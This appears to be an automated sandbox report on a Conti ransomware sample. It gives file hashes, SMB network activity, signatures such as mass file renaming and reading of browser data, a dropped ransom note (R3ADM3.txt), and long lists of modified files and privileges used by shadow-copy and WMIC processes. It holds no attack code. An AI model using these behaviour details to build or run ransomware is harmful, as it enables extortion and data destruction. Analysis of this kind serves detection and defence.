N/A 10.127.0.65:445 tcp
N/A 10.127.0.65:139 tcp

Files

C:\Users\Admin\Desktop\032422-readme.html

MD5 57fa8637b235e5993918ef1bea17705e
SHA1 7afae622daff5fd49e890478a0f2c78c61f35576
SHA256 dea9c5e92641b2ee485d347aef2127c2fcefb9a86e46708cdc71f601fa6b32db
SHA512 98d659189d050257228ded2471cf1bf62c396f1a5d7f273ac64632eec2e019c4ac8a212cd1fc77e1b8de93b085c18670ea06b199ba36a98f3b5bcfdbab926bb9

Analysis: behavioral13

Detonation Overview

Submitted

2024-07-07 14:07

Reported

2024-07-07 14:38

Platform

win7-20240705-en

Max time kernel

1563s

Max time network

1572s

Command Line

"C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe"

Signatures

Conti Ransomware

ransomware conti

Renames multiple (7995) files with added filename extension

ransomware

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A

Reads user/profile data of web browsers

spyware stealer

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files\Microsoft Games\Chess\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\FreeCell\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\G2KVEH0D\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Default\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Mahjong\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\7JXML4U5\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Hearts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Solitaire\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Contacts\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Searches\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\CNQY6MQU\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Public\Recorded TV\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Purble Place\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\Stationery\Desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\72EHROQQ\desktop.ini C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02404_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.equinox.p2.core.feature_1.3.0.v20140523-0116\feature.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Common Files\System\msadc\handsafe.reg C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\management-agent.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099202.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105388.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PE00934_.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\MARQUEE.POC C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\jvmti.h C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0299763.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD10254_.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\tt\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\FRENCH.LNG C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105306.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL083.XML C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\SPPlugins\ADMPlugin.apl C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT+2 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Riga C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\config\Modules\org-netbeans-modules-favorites.xml_hidden C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0382930.JPG C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\BG_ADOBE.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\ISO690.XSL C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT+8 C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-core-multiview.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-masterfs.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms\VIEW.ICO C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0182902.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0241781.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309705.JPG C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.nl_zh_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\rtf_choosefont.gif C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR45B.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\AG00129_.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\VideoLAN\VLC\locale\ug\LC_MESSAGES\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0332364.WMF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\bin\sysinfo.bat C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\STUDIO\PREVIEW.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR43B.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.ui.ja_5.5.0.165303.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\icons\flight_recorder.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\ENU\Dynamic.pdf C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Premium.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\fontconfig.properties.src C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File created C:\Program Files\Java\jre7\lib\zi\America\Indiana\R3ADM3.txt C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\PRODIGY.NET.XML C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Push\push_title.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.io_8.1.14.v20131031.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.util_8.1.14.v20131031.jar C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.feature_3.9.1.v20140827-1444\feature.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0309480.JPG C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Pago_Pago C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\Beige.css C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\feature.properties C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-filesystems.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\EADOCUMENTAPPROVAL_REVIEW.XSN C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\flower_precomp_matte.wmv C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR28F.GIF C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolIcons\StatusOnline.ico C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\update_tracking\org-netbeans-modules-profiler-attach.xml C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0313974.JPG C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Dawson C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\images\Back-48.png C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RansomwareSamples\Conti_22_12_2020_186KB.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\wbem\WMIC.exe N/A
